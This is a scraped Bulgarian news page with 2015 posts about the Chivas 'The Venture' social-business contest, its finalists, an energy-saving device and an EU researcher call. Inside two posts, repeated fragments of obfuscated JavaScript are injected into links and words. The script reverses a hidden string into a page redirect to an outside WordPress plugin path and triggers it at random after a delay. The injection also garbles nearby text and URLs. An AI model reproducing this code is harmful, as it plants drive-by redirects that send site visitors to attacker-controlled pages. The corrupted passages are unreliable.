Bread Houses спечели българския конкурс за социални бизнес идеи

February 20, 2015 in ОТТ Новини

Пекарна, в която работят хора в неравностойно положение. Това е българският проект, който стана победител в националния кръг на международното състезание Chivas “The Venture” с общ награден фонд 1 млн. долара. Bread Houses Network беше отличен като най-перспективния и социално насочен проект измежду общо четири компании, стигнали до финала.

Победителят 

Чрез своите пекарни Надежда Григорова има за цел да приобщи и социализира хора в неравностойно положение и деца, лишени от родителска грижа. По този начин те биха могли да се научат на занаята, свързан с месене, печене и дори продаване на домашно приготвен хляб. До момента основателката на Bread Houses Network е отворила общо седем пекарни в различни градове на България. Плановете й са да развие бизнеса си навсякъде по света, за да може да помогне на възможно най-много хора, които иначе не биха могли да общуват помежду си. Организации като Червения кръст, ЮНЕСКО, фондация “Лумос” и много други са партньори в инициативата на младата българка. Тя силно вярва в силата на ръчно направения хляб, който успява да сближи хората без значение какво е социалното им положение.

Конкурентите

До финалния етап освен победителя достигнаха компаниите Аrthesis, Dronamics и Small Foot. Екипът на Аrthesis разработва уникални и дизайнерски обвивки на протези за хора с ампутация на крака. Чрез тях те искат да вдъхнат самочувствие и да променят живота на хората в нужда. Dronamics подготвят прототип на безпилотни самолети, т.нар. карго дрони, които лесно, евтино и бързо могат да транспортират стоки до недостъпните градове и села. Основателите на Small Foot предлагат иновативните си снегоходки, с помощта на които любителите на зимни спортове ще улеснят предвижването си в планински условия.

Общото представяне 

Журито, съставено от шестима успели български предприемачи, в продължение на три месеца разгледа общо 127 кандидатури. От Chivas обявиха, че България е на четвърто място от 14 държави участнички по брой компании изявили желание да се включат в конкурса. Това е добър показател за развитието на предприемаческата екосистема у нас, като се има предвид завидно по-големият брой население на останалите страни, включили се в конкурса. Това са Чили, Китай, Колумбия, Мексико, Бразилия, Япония, Южна Африка, Тайланд, Украйна, Уругвай, САЩ, Великобритания и страните от Персийския залив.

Всяка държава излъчва своя победител на национално ниво. Избраните екипи ще преминат през едноседмичен тренировъчен лагер в Силициевата долина през лятото, където ще получат полезни съвети за изграждането на успешен бизнес. Техни ментори ще бъдат водещи лидери в предприемаческите среди, които ще им помагат в подготовката за големия финал. Глобалното жури ще избере кои са най-добрите проекти, между които ще се разпредели наградата от 1 млн. долара.

Източник: http://www.capital.bg/

Автор на статията: Сирма Пенкова

 

 

Как да спестим 25% от използвания ток от климатика?

February 20, 2015 in ОТТ Новини

Любомир Янчев* – предполагам, че сте чували това име, или ако не сте, то със сигурност за в бъдеще ще го чувате все по-често. Изгледайте репортажа на тв7  и разберете коя е “Мелиса” и как ще Ви помогне да спестявате до 25% от използвания ток от климатика.

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-sofia.com/wp-content/uploads/2015/02/melisa.jpg">melisa$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-sofia.com/wp-content/uploads/2015/02/melisa-300x169.jpg" width="300" height="169" />Изтоник снимка: http://tv7.bg/

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to/vsichki-videa/-melisa-se-grizhi-za-komforta-ti-vkashti/134234#.VOc03PmUdVL">http://news7.bg/predavania/oshte-neshtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to/vsichki-videa/-melisa-se-grizhi-za-komforta-ti-vkashti/134234#.VOc03PmUdVL

*Един от успешните проекти представени по време на един от семинарите, организирани от Офис за технологичен трансфер “Иновативен капитал” е изобретеното от младия предприемач Любомир Янчев устройство Baggii. Устройството представлява малка Bluetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tooth приставка, която може да се прикачи към най-значимите ваши вещи – тези, които в никакъв случай не искате да загубите. Впоследствие смартфонът ще сигнализира, ако предметът с приставката е изоставен някъде. Той ще може да отчита и ориентировъчно на какво разстояние сте от търсения предмет, дали се приближавате или отдалечавате. Съвместно с  представител от бизнеса, който екипа на ОТТ “Иновативен капитал” беше осигурил по време на един от семинарите Любомир Янчев успя да разработи и комерсиализира изобретението си.

Източник: http://news7.bg/

Хляб за 1 милион долара

February 12, 2015 in ОТТ Новини

Основателката на „Мрежа Хлебни Къщи” Надежда Савова-Григорова е българският финалист в глобалната инициатива за социални предприемачи  ‘THE VENTURE’ WIN THE RIGHT WAY на CHIVAS.  Тя ще представи България на Големия Финал на 20 юли в Силициевата Долина, Сан Франциско. Надежда ще се състезава за част от наградния фонд от $1 000 000 с финалистите от останалите 13 страни участнички.

Страната ни се нареди на четвърто място по брой на подадени кандидатури в световен мащаб. Четири оригинални проекта стигнаха до българския полуфинал в тази надпревара на иновационни идеи, които съчетават бизнеса със социалния принос и ангажираност към обществото. Единствената дама сред полуфиналистите, основател и собственик на „Мрежа Хлебни Къщи”, заслужи най-високата оценка на локалното жури. Магията на хляба, който носи радост и живот, който се превръща в обединяващ символ за всички хора и култури е и израз на единство, вдъхновява Надежда Савова-Григорова за това начинание. Хлебните къщи са местни институции, където се провеждат регулярни събития с месене и печене на хляб с хора от деликатни социални групи. Социалният заряд на тази идея е заложен в т.н. „общностни месения на хляб”, които имат културно-образователен и терапевтичен аспект – рисуване с брашно, изработване на кукли от тесто, месене на хляб от слепи хора.

Надежда Григорова е собственик на две развити и функциониращи Хлебни къщи, а в дългосрочен план е предвидено във всеки областен град на България да бъде създадена такава Къща, която да работи като социално-културен център и социално предприятие фурна за хляб.

Надежда Савова-Григорова е културен антрополог с диплома в Университета „Принстън“, САЩ. През 2008 г. основава Международния Съвет на Самодейните Средища /световна мрежа от културни центрове/,  създател е на първата Хлебна Къща в дома на своята прабаба в Габрово. И още – пътешественик на Годината на Нешънъл Джиографик /2012/, презентатор, консултант по културни политики /към ЮНЕСКО/, иконописец, поет, фотограф, творец. Любовта към хляба обаче, е истинския център в живота й – начин да предаде доброто и надеждата с енергията на ръцете. Културата на хляба и идеята на Хлебните къщи на Надежда Савова-Григорова, вече са прехвърлили границите на България. Интерес към това начинание има в над 15 страни по света, а реализацията по разширяване на този благороден проект предстои.

Членовете на журито на конкурса “The Venture – WIN THE RIGHT WAY” за България бяха Елица Панайотова – изпълнителен директор на “София тех парк”, Павел Езекиев – управляващ фонда за рисков капитал NEVEQ, Галя Прокопиева – изпълнителен директор на „Икономедия”, Манол Пейков – издател и собственик на издателска къща „Жанет 45”, Боян Бенев – млад предприемач и Мирослава Симова  – управляващ директор на „Pernod Ricard” за България. Критериите, по които журито оценява проектите бяха какъв мащаб на положително въздействие притежава този бизнес, доколко идеята съвпада с ценностите на Chivas Regal, колко голям е потенциалът на този проект, добре ли са проучени възможностите и пазарът за тази идея, практична ли е тя, подходяща ли е за локалния ни пазар, колко скоро се очаква разгръщането на капитала, има ли патент върху интелекуална собственост, съществуват ли патенти, свързани с технологии, притежава ли екипа умения да се справи с предизвикателството и проекта.

Нашата финалистка ще бъде подготвена за Големия Финал в The Venture от експерти в социалното предприемачество и компетентни професионалисти. Тя ще представи своята идея пред международното жури в Силицевата Долина, което ще определи и крайния победител в тази амбициозна надпревара. Журито ще има последна дума в  разпределянето на $750 000 от общото финансиране – останалите $250 000 зависят от гласувалите за всеки индивидуален проект.

Всеки желаещ ще може да гласува чрез crowdfunding платформата IndieGogo и да даде своя глас за своя фаворит. Очаквайте подробности за начина, по който бихте могли да подкрепите българския финалист в The VENTURE наофициалната страница на инициативата  и Facebook страницата на Chivas Regal Bulgaria.

Източник: http://www.manager.bg/

Автор на статията: Сирма Пенкова

ЕС набира изследователи

February 10, 2015 in ОТТ Новини

Ако сте учен, заинтересован от подкрепа на политиките на ЕС с ваши изследвания, това е шансът Ви. Съвместният изследователски център  (JRC) стартира покана за набиране на персонал на срочни договори. Успешните кандидати ще работят в един от сайтовете на JRC, намиращи се в Германия, Белгия, Италия, Испания и Холандия.

Селекцията е отворена за кандидати от държави-членки на Европейския съюз, или от една от страните, свързани с Хоризонт 2020 за научни изследвания и иновации (Албания, Босна и Херцеговина, Фарьорските острови, Бившата югославска република Македония, Исландия, Израел, Молдова, Черна гора, Норвегия, Сърбия, Швейцария и Турция), диплома от университет или докторска диплома в една от научните области, посочени в поканата (виж подробности по-долу).

Процесът на подбор включва практически тестове, въз основа, на които успелите кандидати ще бъдат включени в списък с резерви и могат да бъдат поканени на интервю в съответствие с нуждите на услугите. Поканата е отворена до второ уведомление.

Научни области: биология, химия, естествени науки, науки за живота, биохимия, океанография / морски науки, нанотехнологии, нанобиотехнологията, ветеринарен, инженерни, математика, физика, компютърни науки, статистика, материалните науки, икономика, политически науки, социални науки, образователни науки , психология, география, науки за околната среда, селскостопанските науки, селскостопанска техника, метеорология, екология, горско стопанство, геология, хидрология науки, медицински науки, фармация, хранителни науки.

Тук ще откриете допълнителна информация за поканата и условията за кандидатстване:

Further information on the call toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and the conditions toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to apply

Apply through the ESRA database

Четири компании са финалистите в конкурса на Chivas за социални бизнес идеи

February 10, 2015 in ОТТ Новини

Четири български компании ще се състезават за място на международния конкурс за социални бизнес идеи Chivas “The Venture”. Победителят ще има възможност да представи проекта си на големия финал в Силициевата долина с награден фонд 1 млн. долара.

Глобалната инициатива, организира от Chivas Regal, има за цел да стимулира младите хора да развият собствен бизнес, който работи в полза на обществото. В конкурса участват общо 14 държави, като всяка от тях излъчва по един победител. Екипите с най-добрите идеи ще имат едноседмичен тренировъчен лагер в Силициевата долина, където ще получат полезни съвети за изграждането на успешен бизнес. Техни ментори ще бъдат водещи лидери и експерти в средите на предприемачите. В края на престоя четиринадесетте финалисти ще представят проектите си пред международното жури, което ще избере големите победители с общ награден фонд 1 млн. долара.

Журито, съставено от шестима успели български предприемачи, трябваше да отличи най-добрите идеи между общо 127 кандидатури. Изборът им се сведе до четири компании, чиято цел е промяна на обществото и средата, в която живеем. Финалистите на националния кръг са Arthesis, Bread Houses Network, Dronamics и Small Foot. 

Arthesis

Основателите на компанията Arthesis – Атанас Дюлгеров, Георги Чипов и Демир Тончев, искат да вдъхнат самочувствие на хората с ампутация на крака, изработвайки уникални обвивки за техните протези. Всеки клиент може сам да измисли дизайна на продукта, така че напълно да отговаря на предпочитанията му. Преди да основат Arthesis, тримата младежи са работили върху други стартъп проекти. Познанията, натрупани в областта на протезирането и 3D принтирането, ги вдъхновяват да създадат продукт, който помага на клиентите им да водят пълноценен и самоуверен начин на живот. Важен елемент в изработването на продукта е софтуерът, който превръща снимки в 3D модели. По този начин всеки нуждаещ се може да снима здравия си крак и да получи съразмерна на него обвивка за протеза. Клиентите имат възможност да избират между готови прототипи или да създадат собствени такива. Към момента цената им варира между 300 и 1500 долара в зависимост от модела, а поръчките стават през сайта на фирмата. Екипът се надява Arthesis да стане разпознаваем аксесоар, който променя живота на хората. В световен мащаб компанията има два конкурента на пазара. За да развият бизнеса си, младите предприемачи имат за цел да създадат мрежа от клиники, които да предлагат и разпространяват продукта им.

Bread Houses Network

Според народните обичаи замесването и печенето на домашен хляб символизират семеен уют и приемственост. Към това се стреми и Надежда Григорова с проекта си Bread Houses Network. Идеята й е да организира срещи на хора в неравностойно положение, които заедно да се научат да приготвят домашен хляб. За да им помогне да се почувстват пълноценни и приобщени, основателката на компанията отваря седем пекарни в различни градове на България, където желаещите могат да практикуват занаята. След като придобият основните умения, хората в неравностойно положение остават на работа в пекарните и продават ръчно направения от тях хляб. Компанията е изградила партньорства с организации като Червения кръст, ЮНЕСКО, фондация “Лумос” и др. Целта на Надежда Григорова е да отвори пекарни в държави от цял свят, за да могат повече хора заедно да се докоснат до заложения в културата ни, одухотворен ритуал на “замесване, печене и разчупване на хляб”.

Dronamics

Лесно, евтино и бързо транспортиране на стоки до недостъпни за познатия транспорт места. Това е проектът на братята Свилен и Константин Рангелови. Тяхната компания Dronamics изработва карго дрони, които могат да пренасят до 350 кг полезен товар на разстояние над 2 хил. км. Карго дроните представляват безпилотни самолети, предназначени за логистичната индустрия. Прототипът, върху който работят братята Рангелови, е иновация в областта поради способността му да пренася големи товари за цивилни цели на далечни дестинации. Социално отговорната страна на компанията им се изразява в ниските разходи за транспорт, което би помогнало за разрастване на търговията и в малките, по-недостъпни градове и села. Основателите на Dronamics работят съвместно с холандски специалисти по авиокосмическо инженерство, а през април очакват да е готов и първият им карго дрон.

Small Foot

За любителите на зимни спортове компанията Small Foot разработва надуваеми леснопреносими снегоходки. Евгени Недялков, Димитър Ковачев, Петър Димитров и Иван Иванов обединяват усилия и създават иновативния продукт, който няма конкурент на пазара и е с патентна защита в САЩ, Канада, Япония, ЕС, Русия и Украйна. Снегоходките Small Foot представляват своеобразна миниатюрна лодка без дъно, която се надува с въздух. Дизайнът им позволява директен контакт на обувката с терена. Технологията на изработване пък спомага за маневреност при ходене, а котките по долната страна на снегоходките подобряват сигурността при изкачване и слизане по твърд сняг. Продуктът е подходящ за хора, които практикуват спортове като сноуборд, сноукайт, парапланеризъм и др. Small Foot се продават в собствен онлайн магазин и чрез дистрибутори по цял свят. Произвеждат се с помощта на компанията за детски обувки “Колев и Колев”. Официалната цена на един чифт е 200 евро, но към българските клиенти компанията води “политика на приятелски продажби” и ги предлага на половин цена. Плановете на собствениците са да разработят нов модел, предназначен за туристи в планината, и да излязат на световния пазар чрез бъдещи партньорства с големи производители.

Източник: http://www.capital.bg/

Автор: Сирма Пенкова